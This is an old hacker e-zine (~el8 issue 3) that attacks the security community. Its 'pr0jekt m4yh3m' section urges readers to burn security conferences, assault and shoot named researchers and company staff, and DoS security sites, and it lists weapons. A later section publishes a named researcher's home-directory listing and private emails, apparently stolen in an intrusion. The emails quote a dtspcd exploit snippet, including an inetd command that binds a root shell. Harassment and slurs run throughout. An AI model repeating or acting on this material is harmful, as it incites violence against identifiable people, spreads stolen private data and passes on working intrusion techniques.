2 August 2002 Source: http://www.eurocompton.net/~fuk/el8.3.txt ----------------------------------------------- #!/bin/sh ################################################ ## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ## ## ---------------------------------------- ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ## ################################################ ##::::::::::::::::::::::::::::::::::::::::::::## ##:'####::::::'########:'##::::::::'#######:::## ##'## ##:'##: ##.....:: ##:::::::'##.... ##::## ##..::. ####:: ##::::::: ##::::::: ##:::: ##::## ##:::::....::: ######::: ##:::::::: #######:::## ##:::::::::::: ##...:::: ##:::::::'##.... ##::## ##:::::::::::: ##::::::: ##::::::: ##:::: ##::## ##:::~el8[3]:: ########: ########:. 
#######:::## ##::::::::::::........::........:::.......::::## ################################################ ## the definitive src for the Porno H/P Scene ## ################################################ ## do "sh " to extract eldump.c ## ## compile eldump.c and use it to extract ## ## the rest of the w4r3z: ## ## $ ./eldump el8.3.txt -vvv ## ## <*> whitehated.topcities.com ## ## <*> ftp.uu.net/tmp/EL8MAGAZINEDONTDELETE ## ## <*> keyword "~el8" on aol.com ## ## <*> www.textfiles.com/~el8 ## ## <*> nipc.gov/~el8 ## ## <*> www.fedworld.gov/0day/~el8 ## ## <*> www.fbi.gov/top10mostwanted/~el8 ## ## <*> www.securityfocus.com/weareowned.txt ## ## <*> www.incidents.org/~el8 ## ## <*> www.whitehats.com/weareowned.txt ## ## <*> www.blackhat.com/plzdonthurtus.txt ## ################################################ ## where have all the 0dayz g0neeeeeeeeeeeee! ## ################################################ cat <<'-+-+'> /dev/null [BOI] [BEGIN_DIR] articles .~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~. |#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#| |#:'## ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#| |#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#| |#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#| |#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::::::::: ########: ########:. 
#######:: ##: #######: ##:::#| |#:::::::::::::........::........:::.......:::..::.......::..::::#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| |#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| `~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~' ,-._,-._ .----------------------------------. _,-\ o O_/; | OpenBSD! The proactively secure | / , ` `| | operating system! ... | | \-.,___, / ` | FOR ME TO PISS ON! | \ `-.__/ / ,.\ `----------------------------------' / `-.__.-\` ./ \' / /| ___\ ,/ `\ ( ( |.-"` '/\ \ ` \ \/ ,, | \ _ \| o/o / \. \ , / / ( __`;-;'__`) \\ `//'` `||` `\ _// || ; .-"-._,(__) .(__).-""-. ` / \ / \ ' \ / \ / ` `'-------` `--------'` ; 11:46PM up 2 days, 6:25, 22 users, load averages: 0.47, 0.27, 0.20 USER TTY FROM LOGIN@ IDLE WHAT deraadt C0 - Wed05PM 5:57 emacs -nw -u deraadt -f zenicb mickey p0 versalo.lucifier Wed07PM 15 icb -n mickey -g hackers -s cvs millert p1 millert-gw.cs.co 3:37PM 2:48 tail -fn-100 /cvs/CVSROOT/ChangeLog deraadt p2 v.openbsd.org Thu11PM 1:06 -csh form p3 vell.nsc.ru Thu11PM 21:29 less /cvs/CVSROOT/ChangeLog pvalchev p4 dsl-dt-207-34-11 Thu05PM 15 tail -fn-50 /home/hack/pvalchev/chan deraadt p5 zeus.theos.com Wed05PM 0 systat vm 1 deraadt p6 zeus.theos.com Wed05PM 2days tail -f /cvs/CVSROOT/ChangeLog deraadt p7 zeus.theos.com Wed05PM 3 -csh deraadt p8 zeus.theos.com Wed05PM 3 gv scanssh.ps deraadt p9 zeus.theos.com Wed05PM 1:26 emacs -nw -u deraadt -f mh-rmail deraadt pa zeus.theos.com Wed05PM 16 less machdep.c deraadt pb zeus.theos.com Wed05PM 16 -csh deraadt pc zeus.theos.com Wed05PM 5:57 -csh angelos pd coredump.cs.colu Thu02PM 2:48 icb -g hackers -h localhost -n angel deraadt pe zeus.theos.com Wed05PM 2:29 -csh provos pf ssh-mapper.citi. Wed05PM 27:21 tail -f I_AM_A_LUSER_AND_A_MORON brad q0 speedy.comstyle. 
Wed06PM 28:27 tail -f /cvs/CVSROOT/ChangeLog aaron q1 nic-131-c68-101. 8:43AM 15 icb -scvs -ghackers lebel q2 modemcable093.15 Thu09PM 2:48 -bash wvdputte q3 reptile.rug.ac.b 5:45AM 12:56 tail -f 2001-09 jason q4 24-168-200-128.w Thu08AM 1day -ksh deraadt q5 hackphreak.org 4:20AM 0 w ~el8 is dope. kool-rad k-fat badassezinenodoubt ~el8 is dope. kool-fresh k-hip shit shit ~el8 is dope. k-hip k-kul elite elite ~el8 is dope. bad ass badaz eliteasshitaselite ~el8 is dope. k-hip fuck!. elite elite ~el8 is dope. kool-fresh ~el8!roxroxrox shit shit ~el8 is dope. kool-rad koolhipawesome badassezinenodoubt .----------------------------------------------------------------. ; t4ble of h0ly w4r3z & bey0nd ; ; `------------------------------' ; ; *00* ~e~ intr0duktion ; ; *01* ~e~ pr0jekt m4yh3m ; ; *02* ~e~ Know Your WhiteHat Enemy ; ; *03* ~e~ zeroday screen exploit ; ; *04* ~e~ lyfestylez of the owned and lamest with pm ; ; *05* ~e~ muz1k in the undergr0und ; ; *06* ~e~ defacements of the milenium ; ; *07* ~e~ ~el8 hitlist tools ; ; *08* ~e~ bronc buster busted ; ; *09* ~e~ lcamtuff helps ~el8 ; ; *10* ~e~ lyfestylez of the owned and lamest with jobe ; ; *11* ~e~ phrack staff demystified ; ; *12* ~e~ gobble blaster ; ; *13* ~e~ 1nterv1ew with te4m OG ; ; *14* ~e~ lyfestylez of the owned and lamest with aempirei ; ; *15* ~e~ chapter sixteen ; ; *16* ~e~ ELDUMP & ELTAG ~el8 ez1ne t00lz ; `----------------------------------------------------------------' .----------------------------------------------------------------. 
; t4ble of ~el8 m3mbrZ ; ; `----------------------' ; ; SiLLY G00S3 -> THe HiGH PReeZT ; ; FuNNY BuNNY -> a BLiP oN YOuR GaYDaR ; ; ODaY MaZTeR -> GeTZ aLL THe HoEZ and CoDEz ; ; ENRiCO -> INSaNe IN ThE MeMBRAiN ; ; ReDPUBeZ -> AkA KARRoT_BoTToM ; ; CaWCaW -> EYe'LL TEaR YoUR EyEZ OuT ; ; KRaD -> sO FReSH & sO CLEaN ; ; PoOtIeTaNG -> CRaZY CooL FRe$h ; ; UNCLe MaViS -> HaS YOu IN A HEaDLoK ; ; TcJ -> ThE CRiMiNaL JESuS ; ; CLiFF SToLE -> CLiFF SToLE YOUR CoDEz ; ; JaMeS BRoWN PaNTZ -> STAiNeD UNDeRWaREZ ; ; JoHNY SiX ToEZ -> MuTaTED MiKE ; ; DiNOSaUR MaN -> THe OLD SCHooL ; ; MiKE TySoN -> THe DaHMeR oF BoXiNG ; ; BaLLSaCK -> Mr HuGE NuTZ ; ; ARaB BiLL -> MeKKa DoN WoN ; ; KaRELeSS KaRL -> EyE DoNT WiPE LoGZ ; ; OSaMA BiN LaDEN -> GeORgE BuSH ; ; ThE UNiX TeRRoRiZt -> RM'z YoUR BoX WiTHOuT ReMORsE ; ; PuSSy FaCEd KiLLa -> GHoST FaCE KiLLaZ HoMEsLiCE ; ; CHiNeeZ TiMMy -> CReAM oF SuM YuN GaI ; ; SeXPaTRiOT -> THe PoRNo HaCKeR ; ; T z D -> TEaM ZeRODaY ; `----------------------------------------------------------------' .~e~----------------------------------------------------------~e~. ; *00* intr0duktion -- ~el8 TEaM ; `----------------------------------------------------------------' ~el8 c0uld f1ll this ez1ne with s0 much shyt but we'd lyke to release 0ver 150 issuez, s0 st4y tun3d. n0 intr0 n33ded. we r the h4rdkore h4krz who clean your toilets, the h4rdkore k0derz who forcefully w1pe y0ur wind0wz @ st0pl1ghtz and intersekti0nz, the h4rdk0re phre4krZ who mow your l4wn, the h4rdk0re cr4krz who ste4l cl0thez from the salvati0n army, we take yor orderz at burger k1ng, we steal yor hubk4pz, we even put k4meraz in port `o pottiez. *_DO_* *_NOT_* *_FUCK_* *_WITH_* *_US_*. ~el8 .~e~----------------------------------------------------------~e~. ; *01* pr0jekt m4yh3m -- ~el8 ; `----------------------------------------------------------------' w1th such h1gh figurez in the sekurity scene being 0wn3d and humili4ted, eye h4ve t0 s4y that pr0jekt m4yhem has been a succ3ss. 
~el8 kn0wz of at le4st 153 DEDICATED FOLLOWERZ to the cause. th3r3 is of course, many others who believe. pr0j3kt M4yh3m cellz oper8 ind3p3ndent of each 0ther. w3 have in fact cre4t3d an army. w3 w1ll n0w n4me a very sm4ll porti0n of pr0j3kt m4yh3m'z victims (th3r3 ar3 0th3rz muwhaah4hahah): k2, dugsong, lance spitcock, horizon, Chris Spencer, provos, Toby Miller, Al Hugher, ISS, NAI, QUALYS, EEYE, deraadt, route, @stake, Brian McWilliams, spaf, zip, TESO, ADM, w00w00, HERT, BVIEW, 0k th1s l1st c4n g0 0n and 0n but w3 d0nt w4nt t0 w4ste it all in 0ne ez1ne. whY be t4rg3t3d by us wh3n y0u can j0in us. why p0st info, codes, or bugs wh3n the end result iz y0ur ent1re syst3m, f4mily, and friends being 0wn3d t0 mega-fuck. d0eznt it l00k like more phun to be a bl4ckhat than a wh1tehat (th3r3 iz no inbetween). w1th that being said, pr0j3kt mayh3m has been br0ught t0 a n3w l3vel. n0 l0nger do we w4nt YOU OUR LOYAL FOLLOWERS to simplY 0wn s3kurity fucks wh0 st3p 0n 0ur turph. w3 w4nt y0u t0 cause w0rldw1de physical destructi0n to the sekurity industry infrastructure. but plz c0ntinue t0 d0 a g00d j0b 0n the internet p0rti0n of projekt m4yhem. h3re is h0w this can be accomplished: ------------------------------------' * g0ing t0 defk0n or blackhat? initiat3 a n4palm stryke. BURN THE M0THERFUCK3R D0WN. bre4k s0me computers. beat the fuck 0ut 0f the whitehat puss1ez wh0 attend or g1ve spe3chez. th1s can be done very easily with the us3 of gas0line and or baseball bats. th1s meth0d applies at all security/"h4ker" cons. * loc8d near a security company? sh00t ISS employeez with a paintball gun (y0u c4n us3 h1gh p0wer3d r1fl3z but iph y0u g3t caught ur in f0r lyfe, s0 use p4intball gunz f0r wh3n you are released you c4n c0ntinue y0ur missions). th1s meth0d appliez t0 all sekurity companies loc8d near y0u. h0wever, iph y0u w1sh t0 m4ke your MECCA pilgramag3 to ISS HQ in ATLANTA, th3n thats f1ne by us. * loc8d near a whitehat security d00d? g1ve em` a g00d mugging. 
thre4ten them that if they c0ntinue in th1s m4nner, y0u w1ll s1lence th3m f0rever. th1s meth0d w0rk3d in f0rc1ng hugh3r d0wn fr0m his p0sition as bugtraq m0derat0r. th1s meth0d also appliez f0r peo0ple wh0 wr1te f0r phr4ck and the like. * sp3cial m3th0d, see a pers0n wear1ng s0me sort of "r00t" clothing, be4t the fuck 0ut 0f them. * special meth0d for missi0n #1 th4t st1ll n33dz t0 be accomplish3d: DoS'n of maj0r sekurity websites. l3tz t4ke 0ut securityfocus, neohapsis, google, incidents, packetstorm, and the lyke. f0ll0werz of ~el8 muzt d0wn th3se s1tez 4ever. w3 w1ll shut them d0wn, and th3y w1ll b0w t0 us. 0ther s1tez w0rth d0wning: freshmeat, slashdot, hackphreak, blackhat, defcon, cnn, infonexus, packetfactory... ~el8's pr0jekt m4yhem sw1ss armY kn1fe: --------------------------------------' * w1re kutterz / metal kutters * HERF gun * spr4y p4int * l1ghter fluid (or diesel fuel) * p4ck of matchez * one bick lighter * some s0rt of face mask (one roll of panty hose) * a backpack * handkuff keys in the heel of your sne4kerz * one smoke bomb and or hand grenade * one rambo knife * one hidden thumb tack * one digital camera to record recruiting material for the el8: -----------' * one taser / stun gun * one bazooka * one ak-47 or m-16 * one police scanner * a pack of big chew bubble gum * and one flame thrower m1ssi0n 0n3 of pr0jekt m4yhem has b33n acc0mplizhed, and must c0ntinue in itz 0n g0ing eff0rt t0 0wn the sekurity / whitehat scene. m1ssi0n tw0 is actu4lly easi3r t0 acc0mpl1sh, s0 l3tz g3t th1s 0ne r0ll1ng. th3 w4r h4z been decl4red, the w4r has been initiated, th3 w4r iz being w0n. -- ~el8 tEaM .~e~----------------------------------------------------------~e~. 
; *02* Know Your WhiteHat Enemy -- odaymaztr ; `----------------------------------------------------------------' Know Your WhiteHat Enemy - odaymaztr ------------------------------------ many of you may have heard of this great new project called 'the honeynet project', aimed at getting a firsthand look at the blackhat hacker mindset and to share the lessons learned. at first glance, you blackhats may think 'oh n0!@# im screwed !@# these whitehats with their 'modified to log' sh binarys are getting so so tricky!@#'. at first it may have seemed a little threatening, but after looking over their whitepapers, apprehension quickly turned to laughter. we were also a little confused when we noticed that evil ADM guys such as 'K2' were part of this whitehat organization. so we decide to investigate ... $ id uid=100(ktwo) gid=100(users) groups=100(users) $ pwd /export/home/ktwo $ ls -al drwxr-x--x 16 ktwo users 4096 . drwxr-xr-x 8 root root 4096 .. drwx------ 3 ktwo users 4096 .BitchX -rw-r--r-- 1 ktwo users 0 .addressbook -rw------- 1 ktwo users 2285 .addressbook.lu -rw-r--r-- 1 ktwo users 1289 .admirc -rw------- 1 ktwo users 5194 .bash_history -rw-r--r-- 1 ktwo users 82 .bashrc drwx------ 2 ktwo users 4096 .gnupg -rw-r--r-- 1 ktwo users 34 .less -rw-r--r-- 1 ktwo users 114 .lessrc drwxr-xr-x 2 ktwo users 4096 .ncftp -rw------- 1 ktwo users 14498 .pinerc lrwxrwxrwx 1 ktwo users 7 .profile -> .bashrc -rw-r--r-- 1 ktwo users 5 .qmail-default drwx------ 2 ktwo users 4096 .screen -rw-r--r-- 1 ktwo users 3394 .screenrc drwx------ 2 ktwo users 4096 .ssh drwxr-xr-x 3 ktwo users 4096 .ssh2 -rw-r--r-- 1 ktwo users 257118 02-03-06 CORE_IMPACT.pdf -rw-r--r-- 1 ktwo users 211975 194_HPYN2E_te_16.ZIP -rw-r--r-- 1 ktwo users 3281174 194_HPYN2E_te_16.doc -rw-r--r-- 1 ktwo users 71145 admirc-0103090536.tgz drwxr-xr-x 10 ktwo users 4096 admirc1 -rw-r--r-- 1 ktwo users 12091 apache-iss.tgz.pgp -rw-r--r-- 1 ktwo users 3830 attn.tar.gz -rw-r--r-- 1 ktwo users 7782 authorbio_instructions.zip 
-rw-r--r-- 1 ktwo users 1827 beto.asc drwxr-xr-x 2 ktwo users 4096 bin -rw-r--r-- 1 ktwo users 32840 caddis-dtspcd.c -rw-r--r-- 1 ktwo users 9810 caddis-radius.c -rw-r--r-- 1 ktwo users 1384 caddis.key -rw------- 1 ktwo users 264 dead.letter drwxr-xr-x 6 ktwo users 4096 dl -rw-r--r-- 1 ktwo users 69408 dtscp.tgz drwxr-x--- 3 ktwo users 4096 dtspc -rw-r--r-- 1 ktwo users 27150 dtspcd-8.6.tgz -rw-r--r-- 1 ktwo users 4833 exploit.html -rw-r--r-- 1 ktwo users 3008 gpg-pubkey.asc drwxr-xr-x 2 ktwo users 4096 ida -rw-r--r-- 1 ktwo users 4535 ihack.c -rw-r--r-- 1 ktwo users 7710 infect.tar.gz -rw-r--r-- 1 ktwo users 47765 irc.txt -rw-r--r-- 1 ktwo users 2268 job -rw-r--r-- 1 ktwo root 188416 list.mdb drwx------ 2 ktwo users 4096 mail -rw------- 1 ktwo users 35331378 mbox -rw-r--r-- 1 ktwo users 912 msg -rw-r--r-- 1 ktwo users 1642 msg.asc -rw-r--r-- 1 ktwo users 3008 new-pub.asc -rw-r--r-- 1 ktwo users 1720 noir -rw-r--r-- 1 ktwo users 1634 pubkey.pgp -rw-r--r-- 1 ktwo users 3824 solar-atach -rw-r--r-- 1 ktwo users 2064 solar-msg -rw-r--r-- 1 ktwo users 12 solar-msg.asc -rw-r--r-- 1 ktwo users 177 suid -rw-r--r-- 1 ktwo users 43 super drwxr-xr-x 3 ktwo users 4096 tmp -rw-r--r-- 1 ktwo users 19668 ttdb.c after exploring all his shells (zolo rulez dewD!!#), the ~el8 investigative unit decided to search his email for clues... (J4n3 and D1ck used in some cases to protect the innocent!) %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: K2 Subject: Re: dtspcd exploit obtained (fwd) Your buddy interested in chatting with the MITRE folks? Alot of people are very impresses with his exploit :) -- Lance Spitzner http://project.honeynet.org ---------- Forwarded message ---------- From: J4ne To: Lance Spitzner Subject: Re: dtspcd exploit obtained I went to the apparent authors website. 
It hardly mentions an interest in security, but it does look like he used to teach at the University of Central Michigan http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with this person at all? I'm wondering if he didn't write this code to teach someone else and then that person started distributing it. This guy looks like he knows his stuff and not stripping the symbols doesn't seem to fit with that. J4n3 Lance Spitzner wrote: > J4n3 wrote: > > > It was very nice of the author to include his name and email :). I was looking > > at the strings output and it looks like the author took a lot of time to do error > > checking and write one of the better usage statements i've seen. I also didn't > > notice a single misspelling and no script kiddish text at first glance. To me > > that says a few things about the author. Is this typical of what you see in > > exploit code? Most of the stuff i've seen in public postings is nowhere near > > this clean. > > Its extremely well written, and powerful. Definitely not our > typical exploit :) > > lance note: mitre has elite modified strings binary to see if author has done proper error checking (very kewl!!!) note: use strip on binarys to confuze forensic analysis!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: K2 Subject: Re: dtspcd exploit obtained (fwd) K2 wrote: > I'll ask him Dude, this is not a big deal. Just a lot of people interested in his exploit code, its more impressive then most. NSA and FBI even asked me for a copy. :) lance note: kn0ck kn0ck eff-bee-eye stiq em up script kid! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: D1ck Song , "'D1ck Ruiu'" , K2 , J4ne Roesch Subject: For Project, OBSD on Sun or Intel? Gents, Seeing as how you are respected OpenBSD guru's, AND members of the Project, wanted to throw this question at you. 
Looks like we might get an OC12 and hardware donated to the Project, specifically for our internal and external webserver and project Infrastructure. We will be standardizing on OpenBSD. Since we have our choice of software, is there any security value add installing OpenBSD on Sparc, or is Intel fine? My line of thinking is the non-Intel architecture would help defeat some exploit code. Or am I just wasting time and making life harder with OpenBSD on Sparc? Thanks! -- Lance Spitzner http://project.honeynet.org note: yeah ur wastin ur time bro, we'd own u even if u installed netbsd on ur xbox. %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: "D1ck H. Rowland" To: "J4ne Hines" , Subject: RE: DTSPCD Exploit > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hey all, I've had several Solaris honeypots compromised where 2 files > (kcsun and antisun) binaries were uploaded, used and than deleted. > Does anyone by any chance (Lance?) know if these are the filenames > for the highly searched for DTSPCD exploit? If not, has anyone whose > honeypots been compromised seen these files downloaded to their box > for use before? > > Can't pull up anything on these filenames at Google. Please advise. On a similar note, has anyone tried putting append-only flags on the target directories to keep the people from removing these files? I'm looking for anyone with experience in using append-only *directories* on honeypots (not just append-only logs). There does not appear to be any references talking about using this technique from what I've seen. Yeah I already know the arguments: "Immutable flags can be bypassed by a knowledgeable attacker..." I suppose the real question is how many people are going to stick around once they found out they're effectively hacking a system with a WORM drive (I suspect not many). 
Additionally, I would like to tie a measure like this to some type of system timer (external or otherwise) that will shut down the connection after X minutes have elapsed of intruder activity. This could help catch them in midway through the panicking process and could lead to some interesting results. Thanks, -- D1ck note: i thought rm'd binarys were not a problem for u forensic experts! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: D1ck Eckholt Subject: Re: ADMmutate Hey, I am not @ honme for another week, but if you want too look into it I supply a paper and some demonstration exploits and vulnerabilities in http://www.ktwo.ca/c/ADMmutate-0.8.4.tar.gz I do my testing against snort or RealSecure works good :) Later, K2 D1ck Eckholt wrote: > hello to canada ;-) > > first at all, sorry for my bad english, but i'll try my very best. > i am a german student and i want to make an short presentation > about your "ADMmutate" tool. i need a little support for doing > that and so i hope, you can help me: > > 1.) which software (network IDS) is the best for a simple test ? > my unix/linux skills are not the best, so i would prefer a IDS > (maybe an older one) for windows NT. > 2.) do you have or know a sourcecode of a simple buffer-overflow > exploit, which can be used with your tool in a presentation ? > 3.) do you know good links where a can go deeper into this topic ? > > so i hope, you have time to help me with my stupid questions, but > i am very interested in this work and i am standing just at the beginning... > > thanks and greetings from germany > > D1ck eckholt > %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Oon cc: 'D1ck Ruiu' Subject: Re: Security Consulting Opportunity James: Lance had copied Dragos and myself on this message. We are based in Vancouver, BC Canada and have quite a bit of experience doing network penetration assessments. 
Dragos has over a decade in the network security field and has been closely tied with the IDS community for some time as well. We are both currently members of the Honeynet Project and have developed our skills over a long period of detailed technical study and review. As both of us are out of town until December 10 working on other client engagements, could you give us a bit more detailed explanation of the size and scope of the assessments and reviews you would like conducted. Information as too weather or not you would need a local presence and the estimated duration of this project. Thank you. K2 Lance Spitzner wrote: > James Oon wrote: > > James, I'm afraid I'm unable to commit to this, however I > have copied to experts in this field, they may be able to > help you out. > > Thanks! > > > G'day Lance, > > > > My name is James Oon, and I was with Sun Microsystems Professional > > Services > > based in Singapore from 1995 to 2000. I have left since for a > > consulting company > > called BEENET. > > > > Anyway, the purpose of the email is to to enquire regarding your > > interest to do a > > security audit for stock exchange. The job is to perform a > > penetration test and > > security review. Problem is that some of the machine is on S/390 > > (especially the > > backend). We are willing to pay a handsome sum for the job. > > > > Please email me back if you are interested or if you know someone > > else who is > > interested. > > > > Many thanks. > > > > Regards > > James Oon > > > > -- > Lance Spitzner > http://project.honeynet.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: D1ck f4ce Subject: Re: virus (err.. cansecwest) Elite!!! I spoke with dragos and he thinks it'd be an awesome addtion too the conf. Sure man, just prep a powerpoint show for the conf or something or however you wanna give a talk. 
Give dragos a showt (dr@kyx.net) or msg him on IRC, i finally got his ass to show up pretty consistantly in #!w00w00 (usually nik dr or something) I think he's mesg'ng you now but I think it's late over there... Let me know how it all goes, I thnk it'd be fun to finally get together ;) We'll be partieng hardcorein Vancouver man :) K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan Subject: Re: Hack Proofing Your Network, Second Edition Hi Catherine: Sounds like an interesting proposition, could you send me the outline and the list of open chapters in case anything else sparks my interest? Also would it be possiable to see a copy of the first edition so I could get an idea of the writing style of the rest of the book. I'm out of town until Monday so please forgive the poor spelling in this email (no access too a good email client when I am remote). Thanks and I look forward to hearing from you, K2 Catherine Nolan wrote: > Hello K2 - > > Please allow me to introduce myself as the acquisitions editor for Syngress > Publishing, my name is Catherine Nolan. > > Your name was forwarded to me by Ryan Russell as a potential author for the > second edition of his book Hack Proofing Your Network: Internet Tradecraft. > In particular Ryan has recommended you for the chapter on IDS Evasion. > > You would be joining the esteemed authoring team already in place consisting > of Kingpin, RSnake, Rain Forest Puppy, Dan Kaminsky, Ryan Permeah, Hal > Flynn, Marc Maiffret (?), and of course Ryan Russell. > > I have an outline available for the topics to be covered in this chapter, if > you are interested in reviewing it please contact me at your earliest > convenience. Also, this chapter is available in the first editon. > > If this topic is not of interest, but you are interested in contributing let > me know and I'll forward you a list of the other open chapters. 
> > We are currently offering $18/ per manuscript page as compensation for this > chapter. We would expect that the new chapter could be delivered in one > month's time. > > I look forward to hearing from you regarding this matter. > > Thank you in advance for your cooperation, > Catherine > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com note: ~el8 will sabotage Hack Proofing Your Network II %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Ryan "D1ck sucking" Russell Subject: Re: book... CHP 16 IDS Evasion Ryan Russell wrote: > Excellent. Just to confirm, which chapter do they have you working on? > > Ryan > > K2 wrote: > > > Hey Ryan, how's it goin? Thanks for the opertunity in working on your > > book, it seems like a pretty cool group. I'm spending some time working > > out my draft for next week. I'll probably demo against snort and > > RealSecure. Hope it's all going well. > > > > Thanks, > > K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Subject: Hailstorm Ryan, I Know you said to use Hailstorm as an example of some packey level evasions, but I believe clicktosecure.com is down and I cannot find much literature about this product. Do you have anything that I could look at? I am going to go on about dugsongs fragrouter and horizons Defeating Sniffers and Intrusion Detection Systems phrack paper that included congestant.c note: k2, the click and point specialist %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Jennifer 8. Lee" Subject: RE: APCO? Just some work with the honeynet, developing some code and tools for use in a few applications. Real life work is pretty demanding right now, allthough I am trying to find openings in the US. I want to be closer to some family. TTYL, K2 Jennifer 8. Lee wrote: > > okay. how are you doing? 
are you working on something interesting? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Nolan Subject: RE: Chapter Here you go... Hope there arent too many bugs, visio died on me so I had to dump one of the diaagrams. K2 Catherine Nolan wrote: > Sure....I'm usually okay with extending dates a day or so. I'll look > forward to reviewing your chapter first thing tomorrow morning. > > C > > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com > > -----Original Message----- > From: K2 [mailto:ktwo@ktwo.ca] > To: Catherine Nolan > Subject: Re: Chapter Delivery Reminder > > Catherine, can you actually give me until the end of day Monday (eg. > 8pm) I am going to be travelling all day and will not have net acess > until then. > > Thanks, > K2 > > Catherine Nolan wrote: > > > Hi Guys - > > I'd like to remind you all that your completed first drafts of your > chapters > > will be due this coming Monday. I would prefer that they be submitted to > me > > during working hours. I can't tell you how many people think Monday means > > Tuesday....because they submit their work at 11:20 PM. > > > > I hope that this will help you plan your weekends accordingly. > > > > Thank you all for your hard work thus far - keep it up! > > > > Best, > > Catherine > > Catherine B. Nolan > > Acquisitions Editor > > catherine@syngress.com > > 781-681-5151 ext 18 > > > > Syngress Publishing > > 800 Hingham Street > > Rockland, MA 02370 > > http://www.syngress.com %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Spitzner Subject: Re: dtspc attack Hey Lance, This version of the dtspcd exploit has been out for quite some time. at least 3 months, it's the same version Ihave. Do you know what signature it set off from snort? 
The guy that wrote it put in some passwords for binaires that would be distributed, so unfortuntatly some kiddies probably got it and are running it all over the 'net :( Anything inperticular you want to know about it? Take care, K2 Here are some snippets from the comments from my copy.. (I origianally found this vuln in '99;) storm:/tmp/dtspcd/src# cat defs.h ... /* inetd shell using above service w/passive success checking and cleanup */ #define DEFAULT_CMD \ "echo \"" /* service here */ " stream tcp nowait root /bin/sh sh -i\">/tmp/x;" \ "/usr/sbin/inetd -s /tmp/x;" \ "sleep 10;" \ "/bin/rm -f /tmp/x "; #define SUCCESS_CMD \ "uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;" \ "PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;" \ "export PATH;echo \"BD PID(s): \"`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`\n" .... storm:/tmp/dtspcd/src# cat dtspcd_ex.c * What does it do? * * 1. remotely and silently gets the equivalent of: * sh$ uname -nsrm * 2. remotely and silently confirms or denies the * existence of arbitrary user names. * 3. remotely and somewhat silently obtain administrator * privileges on the machine. * * FEATURES: * i. ability to completely generate a target via command line * parameters. * ii. automatically detects which built-in target to use. * iii. command line options override target settings. * iv. cidr block scanning with CFLAGS='-DALLOW_CIDR -lm' * v. option to read targets from a file * vi. ability to brute force the target using -b * vii. several different exploitation methods * iix. optional password checking for binary release * ix. passive success checking using sleep shell command * x. tries multiple offsets automatically... * * PLANNED: (personal notes) * - maybe do other OS's (AIX, OSF1) * - eliminate nops.. * * NOTE: this program logs nothing unless dtspcd is ran with * -debug option. * * With use #3, worst cases are: * a. /core created :( * b. 
